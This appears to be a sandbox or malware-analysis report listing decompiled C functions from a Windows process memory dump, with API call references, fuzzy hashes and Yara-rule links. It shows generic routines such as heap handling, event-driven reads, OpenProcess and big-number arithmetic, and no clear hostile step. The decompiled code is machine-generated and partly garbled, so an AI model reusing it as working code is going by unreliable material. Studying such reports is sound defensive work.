Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: 0e4dde3f04459217c6fa9e26c713a1c28af56d8cef28ce40bd361b7a7ef0020d
Instruction ID: 6d5e98eb90405bab9f684fd6019f35814b21da99b4f084d16e9c644e73097f13
Opcode Fuzzy Hash: 0e4dde3f04459217c6fa9e26c713a1c28af56d8cef28ce40bd361b7a7ef0020d
Instruction Fuzzy Hash: 2FF05871610341DBDB208F28ED49F0A77E5AF14701F044016F509C736AC730E840DB36

Uniqueness

Uniqueness Score: -1.00%

Function 00D96B92, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00D96B92() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xd9d324; // 0x4bd95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xd9d324; // 0x4bd95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xd9d324; // 0x4bd95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xd9e845) {
					HeapFree( *0xd9d238, 0, _t10);
					_t7 =  *0xd9d324; // 0x4bd95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00d96b92
0x00d96b9b
0x00d96bab
0x00d96bab
0x00d96bb0
0x00d96bb5
0x00000000
0x00000000
0x00d96ba5
0x00d96ba5
0x00d96bb7
0x00d96bbc
0x00d96bc0
0x00d96bd3
0x00d96bd9
0x00d96bd9
0x00d96be2
0x00d96be4
0x00d96be8
0x00d96bee

APIs

RtlEnterCriticalSection.NTDLL(04BD9570), ref: 00D96B9B
Sleep.KERNEL32(0000000A,?,?,?,00D92018,?,?,?,4D283A53,?,?), ref: 00D96BA5
HeapFree.KERNEL32(00000000,?,?,?,?,00D92018,?,?,?,4D283A53,?,?), ref: 00D96BD3
RtlLeaveCriticalSection.NTDLL(04BD9570), ref: 00D96BE8

Strings

Uxt, xrefs: 00D96BD3

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: 05c2406587f46d16b8a21099d77f079273f278ff665f149cd607a0eb4e98527a
Instruction ID: 45c67593ae27d483666abc7df4e5ff8424b4cb8acf6f507adcb5cad30f391b45
Opcode Fuzzy Hash: 05c2406587f46d16b8a21099d77f079273f278ff665f149cd607a0eb4e98527a
Instruction Fuzzy Hash: 15F0B2B4A10300DFEB188B24DD99A1537E6AB58706B49411AF506DB368D630EC40CB35

Uniqueness

Uniqueness Score: -1.00%

Function 00D93970, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D93970(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0xd9d114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0xd9d238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x00d93978
0x00d9397b
0x00d9397d
0x00d93986
0x00d93998
0x00d93998
0x00d9399c
0x00d9399e
0x00d939a1
0x00d939a4
0x00d939ad
0x00d939b7
0x00d939bb
0x00d939c0
0x00d939d6
0x00d939da
0x00d93a2b
0x00d939dc
0x00d939dc
0x00d939e4
0x00d939f3
0x00d939f8
0x00d93a08
0x00d93a0e
0x00d93a19
0x00d93a23
0x00d93a27
0x00d93a27
0x00d939da
0x00d93a32
0x00d93a39

APIs

lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 00D939A4
RtlAllocateHeap.NTDLL(00000000,?), ref: 00D939D0
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00D939E4
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00D939F3
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00D93A0E

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 0aa7943b425102ee6ac598a80026ff847b08164e3521373877d28c594a20e91c
Instruction ID: cf7f2f02bb8ca1fe78e8f232f740cf9f5c48d8459555ae310a9756db504d9bf7
Opcode Fuzzy Hash: 0aa7943b425102ee6ac598a80026ff847b08164e3521373877d28c594a20e91c
Instruction Fuzzy Hash: C9214A36900249AFCF129FA8C848A9EBFB9EF85700F098155F844AB315D771DA19CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D93F5E, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D93F5E(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00D94F14(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00D9A77A(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0xd9d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x00d93f5e
0x00d93f6b
0x00d93f6d
0x00d93fd0
0x00000000
0x00d93fd0
0x00d93f85
0x00d93f8c
0x00d93f98
0x00d93f9d
0x00d93f9f
0x00d93fa1
0x00d93fa3
0x00d93fa5
0x00d93fa7
0x00d93fb3
0x00d93fc3
0x00000000
0x00d93fb5
0x00d93fb5
0x00d93fbc
0x00d93fc9
0x00d93fc9
0x00d93fc9
0x00d93fbc
0x00d93fb3
0x00d93fce
0x00000000
0x00000000
0x00d93fd4

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,00D9519D,?,?,747C81D0,00000000), ref: 00D93F98
ResetEvent.KERNEL32(?), ref: 00D93F9D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?,?), ref: 00D93FB5
GetLastError.KERNEL32(?,?,00000102,00D9519D,?,?,747C81D0,00000000), ref: 00D93FD0

Part of subcall function 00D94F14: lstrlen.KERNEL32(00000000,00000008,?,74784D40,?,?,00D93F7D,?,?,?,?,00000102,00D9519D,?,?,747C81D0), ref: 00D94F20
Part of subcall function 00D94F14: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00D93F7D,?,?,?,?,00000102,00D9519D,?), ref: 00D94F7E
Part of subcall function 00D94F14: lstrcpy.KERNEL32(00000000,00000000), ref: 00D94F8E

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?), ref: 00D93FC3

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: d322e9ecbfbbda813ab49eb365f4fdaffc977868a8c2e9ca1a4c7f1db635c975
Instruction ID: 92a3a991defcdabfc1c5154491d9fc008657c62a1f210e345e79f7a15a1fd2cf
Opcode Fuzzy Hash: d322e9ecbfbbda813ab49eb365f4fdaffc977868a8c2e9ca1a4c7f1db635c975
Instruction Fuzzy Hash: EA018632504301ABDF306F65DC48F1BBAB9EF88360F244A25F551E10E0C730E915DA70

Uniqueness

Uniqueness Score: -1.00%

Function 00D93B0B, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D93B0B(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xd9d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xd9d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xd9d258 = _t6;
					 *0xd9d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xd9d254 = _t7;
					if(_t7 == 0) {
						 *0xd9d254 =  *0xd9d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x00d93b13
0x00d93b19
0x00d93b20
0x00000000
0x00d93b7a
0x00d93b22
0x00d93b2a
0x00d93b37
0x00d93b37
0x00d93b77
0x00000000
0x00d93b77
0x00d93b39
0x00d93b39
0x00d93b3e
0x00d93b50
0x00d93b55
0x00d93b5b
0x00d93b61
0x00d93b68
0x00d93b6a
0x00d93b6a
0x00000000
0x00d93b71
0x00d93b33
0x00000000
0x00000000
0x00d93b35
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00D956AC,?), ref: 00D93B13
GetVersion.KERNEL32 ref: 00D93B22
GetCurrentProcessId.KERNEL32 ref: 00D93B3E
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00D93B5B
GetLastError.KERNEL32 ref: 00D93B7A

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 53401d2310213e25bd01a8facc27bf3b45a9434a01586a122c4049c76a2a19da
Instruction ID: 9cc134fbed3d44635c535cd45fb42fbbd357378d099edce2638fb65043f70306
Opcode Fuzzy Hash: 53401d2310213e25bd01a8facc27bf3b45a9434a01586a122c4049c76a2a19da
Instruction Fuzzy Hash: 5FF0A970695342EBDB209FA4EC2AB143B62E780759F10011BE58AC73E0E670C501CB39

Uniqueness

Uniqueness Score: -1.00%

Function 00D94B71, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00D94B71(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xd9d2a4; // 0x3e3a5a8
					_t5 = _t103 + 0xd9e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xd9c298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xd9d2a4; // 0x3e3a5a8
												_t28 = _t109 + 0xd9e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xd9d2a4; // 0x3e3a5a8
														_t33 = _t79 + 0xd9e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x00d94b76
0x00d94b7f
0x00d94b80
0x00d94b84
0x00d94b8a
0x00d94b90
0x00d94b99
0x00d94b9f
0x00d94ba9
0x00d94bab
0x00d94bb1
0x00d94bb6
0x00d94bc1
0x00d94bc7
0x00d94bcc
0x00d94cee
0x00d94bd2
0x00d94bd2
0x00d94bdf
0x00d94be5
0x00d94beb
0x00d94bef
0x00d94bf5
0x00d94c02
0x00d94c06
0x00d94c0c
0x00d94c0f
0x00d94c17
0x00d94c18
0x00d94c1c
0x00d94c20
0x00d94c23
0x00d94c26
0x00d94c2c
0x00d94c35
0x00d94c3b
0x00d94c3c
0x00d94c3f
0x00d94c40
0x00d94c41
0x00d94c49
0x00d94c4a
0x00d94c4b
0x00d94c4d
0x00d94c51
0x00d94c55
0x00000000
0x00000000
0x00d94c5b
0x00d94c64
0x00d94c6a
0x00d94c74
0x00d94c78
0x00d94c7a
0x00d94c87
0x00d94c8b
0x00d94c93
0x00d94c98
0x00d94caa
0x00d94cac
0x00d94cb2
0x00d94cb2
0x00d94cbb
0x00d94cbb
0x00d94cbd
0x00d94cc3
0x00d94cc3
0x00d94cc6
0x00d94ccc
0x00d94ccf
0x00d94cd8
0x00000000
0x00000000
0x00000000
0x00d94cd8
0x00d94c2c
0x00d94c26
0x00d94c0f
0x00d94cde
0x00d94cde
0x00d94ce4
0x00d94ce4
0x00d94cea
0x00d94cea
0x00d94cf3
0x00d94cf9
0x00d94cf9
0x00d94bb6
0x00d94d02

APIs

SysAllocString.OLEAUT32(00D9C298), ref: 00D94BC1
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00D94CA2
SysFreeString.OLEAUT32(00000000), ref: 00D94CBB
SysFreeString.OLEAUT32(?), ref: 00D94CEA

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 72f35238657b64c6287d22cf6c12c74675bdd99dc1792a206ff687caa7f04986
Instruction ID: 3b1d3a5fdf08841b846f6a9caf573356187dbc612b417e3689a0c797dabeff1c
Opcode Fuzzy Hash: 72f35238657b64c6287d22cf6c12c74675bdd99dc1792a206ff687caa7f04986
Instruction Fuzzy Hash: D0512A75E00619EFCF00DBA8C988DAEB7BAEF89704B144595E915EB311D7319D42CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D94D8C, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00D94D8C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00D94481(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00D965B9(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00D98344(_t101,  &_v236, _a8, _t96 - _t81);
					E00D98344(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00D965B9(_t101, 0xd9d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00D965B9(_a16, _a4);
						E00D94492(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00D9AE98();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00D9AE92();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00D98643(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00D9805E(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00D93A3C(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xd9d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00d94d8f
0x00d94d9b
0x00d94da1
0x00d94da6
0x00d94daa
0x00d94f07
0x00d94f0b
0x00d94f0b
0x00d94db0
0x00d94db4
0x00d94db8
0x00d94dbb
0x00d94dc6
0x00d94dcc
0x00d94dd1
0x00d94dd4
0x00d94dee
0x00d94dfa
0x00d94e03
0x00d94e0d
0x00d94e12
0x00d94e14
0x00d94e17
0x00d94ec5
0x00d94ecb
0x00d94edc
0x00d94eef
0x00d94eff
0x00000000
0x00d94f04
0x00d94e20
0x00d94e27
0x00d94e2b
0x00d94e31
0x00d94e33
0x00d94e35
0x00d94e37
0x00d94e39
0x00d94e43
0x00d94e48
0x00d94e4a
0x00d94e4c
0x00d94e4d
0x00d94e4e
0x00d94e4f
0x00d94e56
0x00d94e5d
0x00d94e60
0x00d94e60
0x00d94e2d
0x00d94e2d
0x00d94e2d
0x00d94e68
0x00d94e70
0x00d94e79
0x00d94e7e
0x00d94e7e
0x00d94e83
0x00000000
0x00000000
0x00d94e85
0x00d94e88
0x00d94e92
0x00000000
0x00000000
0x00d94e94
0x00d94e94
0x00d94e9e
0x00d94e7e
0x00d94e83
0x00000000
0x00000000
0x00000000
0x00d94e83
0x00d94ea8
0x00d94eab
0x00d94eae
0x00d94eb5
0x00d94eb5
0x00d94ec2
0x00000000
0x00d94ec2
0x00d94dbd
0x00d94dc1
0x00d94dc2
0x00d94dc4
0x00000000
0x00000000
0x00000000
0x00d94dc4
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00D94E39
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00D94E4F
memset.NTDLL ref: 00D94EEF
memset.NTDLL ref: 00D94EFF

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 0da88e4f7fff229e72786bf73f31c1597cce05c4b1f09dfe840699d3679c1ed2
Instruction ID: de79436aa742bd9279ce71c50ede37666daa37c6a23014d297f53da2e7149b4a
Opcode Fuzzy Hash: 0da88e4f7fff229e72786bf73f31c1597cce05c4b1f09dfe840699d3679c1ed2
Instruction Fuzzy Hash: 4C419E72A00219ABDF10DFA8CC41FEE7764EF45710F008529F919A7285DB70AE458BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A77A, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,74784D40), ref: 00D9A78C

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

ResetEvent.KERNEL32(?), ref: 00D9A800
GetLastError.KERNEL32 ref: 00D9A823
GetLastError.KERNEL32 ref: 00D9A8CE

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: b484ba4b29c51d6c44eb384b59ebaae4c938de944fe1866a7d6405b1eb3c94aa
Instruction ID: 1747dd8d3150c8d1c0b926270d5479fbd89de0d2bb454b7c5cb451db5b006a29
Opcode Fuzzy Hash: b484ba4b29c51d6c44eb384b59ebaae4c938de944fe1866a7d6405b1eb3c94aa
Instruction Fuzzy Hash: 04419F72500304BFDB31AFA5CD89D9B7BBEEB85B04F14092AF502E21A0E7709905CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D94597, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00D94597(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0xd9d138() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0xd9d168(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E00D96D10(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0xd9d138() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E00D95802( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E00D945B3(_v16);
										if(_t64 == 0) {
											_t64 = E00D96C55(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E00D95802( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E00D94383(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x00d94597
0x00d94598
0x00d9459e
0x00d945a9
0x00d945a9
0x00d945ab
